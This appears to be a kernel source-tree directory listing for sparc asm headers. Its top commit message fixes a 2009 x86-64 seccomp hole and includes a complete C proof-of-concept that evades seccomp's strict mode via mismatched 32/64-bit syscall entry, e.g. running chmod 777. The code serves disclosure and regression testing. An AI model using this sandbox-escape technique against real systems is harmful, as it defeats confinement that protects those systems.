kernel-fxtec-pro1x/arch/sparc/include/asm
Roland McGrath 5b1017404a x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00
..
agp.h
apb.h
apc.h
asi.h
asm.h sparc: Add asm/asm.h 2008-12-09 00:50:13 -08:00
asmmacro.h sparc: remove CONFIG_SUN4 2008-08-31 20:59:37 -07:00
atomic.h
atomic_32.h atomic_t: unify all arch definitions 2009-01-06 15:59:10 -08:00
atomic_64.h atomic_t: unify all arch definitions 2009-01-06 15:59:10 -08:00
auxio.h
auxio_32.h
auxio_64.h
auxvec.h
backoff.h
bbc.h
bitext.h
bitops.h
bitops_32.h sparc: asm/bitops.h should define __fls 2008-12-03 16:04:52 -08:00
bitops_64.h sparc64: Stop using memory barriers for atomics and locks. 2008-12-04 09:16:47 -08:00
btfixup.h
bug.h
bugs.h sparc64: Implement SSTATE purely using notifiers and initcalls. 2008-09-02 00:49:38 -07:00
byteorder.h byteorder: make swab.h include asm/swab.h like a regular header 2009-01-14 19:56:50 -08:00
cache.h
cacheflush.h
cacheflush_32.h
cacheflush_64.h
chafsr.h
checksum.h
checksum_32.h
checksum_64.h
chmctrl.h
clock.h
cmt.h
compat.h x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
compat_signal.h
contregs.h
cpudata.h
cpudata_32.h
cpudata_64.h sparc64: Implement NMI watchdog on capable cpus. 2009-01-30 00:03:53 -08:00
cputime.h
current.h
cypress.h
dcr.h
dcu.h
delay.h
delay_32.h
delay_64.h
device.h powerpc and sparc: Introduce dev_archdata node accessors 2008-12-03 21:03:54 +11:00
display7seg.h
div64.h
dma-mapping.h
dma-mapping_32.h sparc32: Implement more generic dma_*() interfaces. 2008-08-29 02:13:14 -07:00
dma-mapping_64.h
dma.h sparc: Kill now spurious includes of sbus.h 2008-08-29 02:15:23 -07:00
ebus_dma.h sparc: Move EBUS DMA interfaces into seperate header file. 2008-08-29 23:10:21 -07:00
ecc.h
eeprom.h
elf.h
elf_32.h [PATCH] remove unused ibcs2/PER_SVR4 in SET_PERSONALITY 2008-10-16 15:40:05 +02:00
elf_64.h [PATCH] remove unused ibcs2/PER_SVR4 in SET_PERSONALITY 2008-10-16 15:40:05 +02:00
emergency-restart.h
envctrl.h
errno.h
estate.h
fb.h
fbio.h
fcntl.h
fhc.h sparc64: Rewrite central driver. 2008-08-31 20:56:15 -07:00
fixmap.h
floppy.h
floppy_32.h sparc: Convert remaining sbus_ioremap() and sbus_iounmap() users. 2008-08-29 02:15:13 -07:00
floppy_64.h sparc64: Convert EBUS floppy support to pure OF driver. 2008-08-29 23:26:23 -07:00
fpumacro.h
ftrace.h
futex.h
futex_32.h
futex_64.h sparc64: FUTEX_OP_ANDN fix 2008-07-30 15:40:50 -07:00
gpio.h sparc: Add GPIO layer support. 2008-08-24 20:33:56 -07:00
hardirq.h
hardirq_32.h
hardirq_64.h
head.h
head_32.h
head_64.h
highmem.h
hugetlb.h
hvtramp.h
hw_irq.h
hypervisor.h sparc64: Add performance counter hypervisor calls for sun4v. 2008-12-04 09:17:09 -08:00
ide.h
idprom.h
intr_queue.h
io-unit.h sparc32: Kill iounit_map_dma_*(). 2008-08-29 02:15:23 -07:00
io.h
io_32.h sparc: Kill sbus_ioremap() and sbus_iounmap(). 2008-08-29 02:15:13 -07:00
io_64.h sparc: Kill sbus_ioremap() and sbus_iounmap(). 2008-08-29 02:15:13 -07:00
ioctl.h
ioctls.h
iommu.h
iommu_32.h sparc: Remove generic SBUS probing layer. 2008-08-29 02:15:21 -07:00
iommu_64.h sparc64: Get rid of pci_controller_info. 2008-09-10 23:07:41 -07:00
ipcbuf.h sparc: unify ipcbuf.h 2009-01-04 15:44:52 -08:00
irq.h
irq_32.h sparc: fix sparse warnings in irq_32.c 2008-12-08 01:08:24 -08:00
irq_64.h sparc64: Implement NMI watchdog on capable cpus. 2009-01-30 00:03:53 -08:00
irq_regs.h
irqflags.h
irqflags_32.h
irqflags_64.h sparc64: Make %pil level 15 a pseudo-NMI. 2008-12-04 09:17:02 -08:00
jsflash.h sparc: fix warning in userspace header jsflash.h 2009-01-02 21:31:13 -08:00
Kbuild byteorder: make swab.h include asm/swab.h like a regular header 2009-01-14 19:56:50 -08:00
kdebug.h
kdebug_32.h sparc32: kernel/trace/trace.c wants DIE_OOPS 2008-11-01 21:44:01 -07:00
kdebug_64.h sparc64: Implement NMI watchdog on capable cpus. 2009-01-30 00:03:53 -08:00
kgdb.h
kmap_types.h
kprobes.h
ldc.h
linkage.h
lmb.h
local.h
lsu.h
machines.h
mbus.h
mc146818rtc.h
mc146818rtc_32.h
mc146818rtc_64.h sparc64: Use generic CMOS driver. 2008-08-29 14:16:48 -07:00
mdesc.h
memctrl.h sparc64: Add generic interface for registering a dimm printing handler. 2008-08-24 22:08:34 -07:00
memreg.h
mman.h
mmu.h
mmu_32.h
mmu_64.h
mmu_context.h
mmu_context_32.h
mmu_context_64.h
mmzone.h
module.h sparc: unify module.h 2008-12-26 15:35:41 -08:00
mpmbox.h
msgbuf.h
msi.h
mutex.h
mxcc.h
nmi.h sparc64: Implement NMI watchdog on capable cpus. 2009-01-30 00:03:53 -08:00
ns87303.h
obio.h sparc32: Move sun4d show_leds() out of asm/obio.h 2008-09-08 15:40:45 -07:00
of_device.h sparc: Add OF archdata propagation helper. 2008-08-29 02:15:20 -07:00
of_platform.h sparc: Kill ebus_bus_type. 2008-08-30 00:37:36 -07:00
openprom.h sparc: unify openprom.h 2009-01-02 21:15:25 -08:00
openpromio.h
oplib.h
oplib_32.h sparc: Kill exports of prom internal functions 2009-01-08 16:58:42 -08:00
oplib_64.h sparc: Kill exports of prom internal functions 2009-01-08 16:58:42 -08:00
page.h
page_32.h sparc: remove CONFIG_SUN4 2008-08-31 20:59:37 -07:00
page_64.h sparc64: Define WANT_PAGE_VIRTUAL 2008-09-11 23:36:32 -07:00
param.h
parport.h sparc: Annotate of_device_id arrays with const or __initdata. 2008-08-31 01:23:17 -07:00
pbm.h
pci.h
pci_32.h sparc: Kill now spurious includes of sbus.h 2008-08-29 02:15:23 -07:00
pci_64.h
pcic.h
pcr.h sparc64: Implement NMI watchdog on capable cpus. 2009-01-30 00:03:53 -08:00
percpu.h
percpu_32.h
percpu_64.h
perfctr.h
pgalloc.h
pgalloc_32.h
pgalloc_64.h
pgtable.h
pgtable_32.h sparc: remove CONFIG_SUN4 2008-08-31 20:59:37 -07:00
pgtable_64.h sparc64: Fix sparse warnings in fault.c 2008-09-12 00:10:32 -07:00
pgtsrmmu.h
pgtsun4.h
pgtsun4c.h
pil.h sparc64: Move generic PCR support code to seperate file. 2009-01-28 17:13:57 -08:00
poll.h
posix_types.h sparc: unify posix_types.h 2009-01-02 18:35:29 -08:00
processor.h
processor_32.h sparc: add '32' suffix to reg_window, sigcontext, __siginfo_t 2009-01-02 19:32:59 -08:00
processor_64.h sparc64: Kill annoying warning when building compat_binfmt_elf.o 2008-11-02 00:15:38 -07:00
prom.h sparc64: Fix irq_of_parse_and_map() and irq_dispose_mapping(). 2008-08-25 16:44:58 -07:00
psr.h
psrcompat.h
pstate.h
ptrace.h sparc: unify ptrace.h 2009-01-02 19:42:12 -08:00
resource.h
ross.h
rwsem-const.h
rwsem.h
sbi.h
scatterlist.h sparc: use sparc64 version of scatterlist.h 2008-12-11 20:24:58 -08:00
scratchpad.h
seccomp.h x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
sections.h sparc: unify sections.h 2008-12-27 00:35:12 -08:00
sembuf.h
serial.h serial: allow 8250 to be used on sparc 2008-10-13 09:51:40 -07:00
setup.h
sfafsr.h
sfp-machine.h
sfp-machine_32.h
sfp-machine_64.h
shmbuf.h
shmparam.h
shmparam_32.h
shmparam_64.h
sigcontext.h sparc: unify sigcontext.h 2009-01-02 19:34:46 -08:00
siginfo.h sparc: unify siginfo.h 2009-01-02 21:10:04 -08:00
signal.h sparc: Fix asm/signal.h for 32-bit. 2009-01-10 23:44:45 -08:00
smp.h
smp_32.h sparc: remove NO_PROC_ID - it is no longer used 2009-01-02 21:33:54 -08:00
smp_64.h
smpprim.h
socket.h
sockios.h
sparsemem.h
spinlock.h
spinlock_32.h sparc: remove unused includes 2008-09-09 19:43:33 -07:00
spinlock_64.h sparc64: Stop using memory barriers for atomics and locks. 2008-12-04 09:16:47 -08:00
spinlock_types.h
spitfire.h sparc: unify kernel/cpu 2008-12-07 00:04:30 -08:00
stacktrace.h
starfire.h sparc64: Delete starfire_cpu_setup(). 2008-08-31 01:40:12 -07:00
stat.h sparc: unify stat.h 2009-01-02 18:48:21 -08:00
statfs.h SPARC: Use <asm-generic/statfs.h> 2008-09-06 19:30:17 +01:00
string.h
string_32.h
string_64.h
sunbpp.h
swab.h sparc: introduce asm/swab.h 2009-01-06 18:10:27 -08:00
swift.h
syscall.h sparc: Add asm/syscall.h 2008-07-27 17:31:48 -07:00
syscalls.h
sysen.h
system.h
system_32.h sparc: Include drivers/pcmcia/Kconfig 2008-12-04 09:17:01 -08:00
system_64.h sparc64: Add write_pic() helper. 2008-12-04 09:17:05 -08:00
termbits.h sparc: Fix tty compile warnings. 2008-11-12 23:51:54 -08:00
termios.h
thread_info.h
thread_info_32.h sparc: add '32' suffix to reg_window, sigcontext, __siginfo_t 2009-01-02 19:32:59 -08:00
thread_info_64.h container freezer: add TIF_FREEZE flag to all architectures 2008-10-20 08:52:33 -07:00
timer.h
timer_32.h sparc32: Delete master_l10_limit. 2008-09-19 21:18:03 -07:00
timer_64.h sparc64: Use unsigned long long for u64. 2009-01-06 13:19:28 -08:00
timex.h
timex_32.h
timex_64.h
tlb.h
tlb_32.h
tlb_64.h
tlbflush.h
tlbflush_32.h
tlbflush_64.h
topology.h
topology_32.h
topology_64.h sparc64: Fix cpumask related build failure 2009-01-11 15:33:24 +01:00
traps.h sparc: drop get_tbr() in traps.h 2009-01-02 21:33:05 -08:00
tsb.h sparc64: Stop using memory barriers for atomics and locks. 2008-12-04 09:16:47 -08:00
tsunami.h
ttable.h sparc64: Make special trap return path for TRAP_NMI(). 2008-12-04 09:17:03 -08:00
turbosparc.h
types.h sparc64: Use unsigned long long for u64. 2009-01-06 13:19:28 -08:00
uaccess.h
uaccess_32.h
uaccess_64.h sparc64: Fix __copy_{to,from}_user_inatomic defines. 2008-11-01 21:41:40 -07:00
uctx.h
unaligned.h
unistd.h sparc: combine unistd_{32,64}.h 2008-12-04 09:17:06 -08:00
upa.h
user.h
utrap.h
vac-ops.h sparc: remove CONFIG_SUN4 2008-08-31 20:59:37 -07:00
vaddrs.h
vga.h
viking.h
vio.h
visasm.h sparc64: Fix sparse warnings in visemul.c 2008-09-11 23:46:40 -07:00
watchdog.h
winmacro.h
xor.h
xor_32.h
xor_64.h